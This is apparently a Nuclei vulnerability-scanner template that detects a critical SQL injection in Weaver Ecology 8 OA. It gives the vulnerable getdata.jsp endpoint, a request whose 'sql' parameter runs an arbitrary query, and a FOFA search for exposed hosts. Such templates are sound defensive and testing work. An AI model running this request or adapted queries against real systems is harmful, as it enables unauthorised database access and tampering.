id: ecology-v8-sqli

info:
  name: Ecology 8 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: Ecology 8 contains a SQL injection vulnerability via a GET request. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20V8%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-89
  metadata:
    max-request: 1
    fofa-query: app="泛微-协同办公OA"
  tags: ecology,sqli

http:
  - method: GET
    path:
      - "{{BaseURL}}/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "474088963122"

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100ed707ba6a3cb8a3ab2e09278c03b3319e7f7cf30967ec4ec1791d06429c7629d02207827e49a66b41d528d6fee3c6171ef2f45a6705768da8cfbe7bdcd1523feeba1:922c64590222798bb761d5b6d8e72950
